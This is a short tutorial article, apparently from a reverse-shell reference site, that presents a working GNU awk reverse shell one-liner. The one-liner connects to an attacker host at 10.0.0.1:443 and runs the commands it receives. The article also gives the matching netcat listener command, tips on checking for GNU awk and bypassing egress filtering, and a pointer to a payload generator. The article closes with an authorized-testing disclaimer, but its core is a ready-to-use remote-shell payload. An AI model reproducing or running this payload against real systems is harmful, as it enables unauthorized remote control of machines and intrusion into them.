Skip to content
reverseshell

AWK Reverse Shell: The Fallback When Nothing Else Is Installed

How a gawk reverse shell uses the /inet/tcp special file, the one-liner, and why it only works with GNU awk — a true last-resort payload.

Published on 2 min read
awkreverse-shelllinux

Some boxes are deliberately bare: no python, no perl, no ruby, a netcat without -e, and /bin/sh is dash so bash's /dev/tcp is gone too. Before you give up, check for awk — because GNU awk can open a network socket, and almost every system has some awk.

The One-Liner

awk 'BEGIN{s="/inet/tcp/0/10.0.0.1/443";while(1){do{printf "shell>" |& s;s |& getline c;if(c){while((c |& getline o)>0)print o |& s;close(c)}}while(c!="exit")close(s)}}' /dev/null

The trick is /inet/tcp/0/HOST/PORT, a GNU awk special filename that opens a TCP connection. The |& operator is awk's two-way pipe — it sends a command's output to the coprocess (the socket) and reads back from it. In effect, awk reads a command from your listener, runs it, and writes the output back over the socket. Catch it with nc -lvnp 443.

The Catch: It Must Be GNU awk

/inet/tcp/ is a gawk extension. It does not exist in:

  • mawk (the default awk on Debian/Ubuntu),
  • busybox awk (most minimal containers),
  • the original nawk/BWK awk.

So before relying on it, confirm:

awk --version | head -1   # look for "GNU Awk"

If it is not GNU awk, this payload silently does nothing. That single check saves a lot of confusion.

When to Reach for It

The awk reverse shell is a genuine last resort, not a first choice. Use it when you have enumerated the box and the usual interpreters are absent — the same situation that makes the perl reverse shell valuable on legacy systems. If a richer interpreter exists, prefer python or bash; the shell you get from awk is raw and benefits from a TTY upgrade once you can run something better.

When It Won't Connect

  1. Not GNU awk — the most common cause; check awk --version.
  2. Egress filtered — prefer 443/80; test per egress filtering.
  3. Listener mismatch — see choosing a listener.

Full checklist: why reverse shells fail.

Generate It

The reverse shell generator emits the awk one-liner with your LHOST/LPORT and the matching listener, ready for the bare-box scenario where it is the only option left.

Authorized Testing Only

Use awk reverse shells only against systems you own or are explicitly authorized to test. Authorization is what makes the work legitimate.

Related articles

Bash Reverse Shell One-Liners: How /dev/tcp Actually Works
The common bash reverse shell one-liners explained line by line, why they need bash (not sh), and how to fall back when /dev/tcp is missing.
bashreverse-shelllinux
Python Reverse Shell: One-Liners That Survive python vs python3
How the python reverse shell one-liner works with socket and pty, why the python/python3 split breaks payloads, and a version-agnostic fallback.
pythonreverse-shelllinux
Ruby Reverse Shell: One-Liners for Boxes That Run Rails
How a ruby reverse shell works with the socket library, the common one-liners, and when Ruby is the interpreter you can count on.
rubyreverse-shelllinux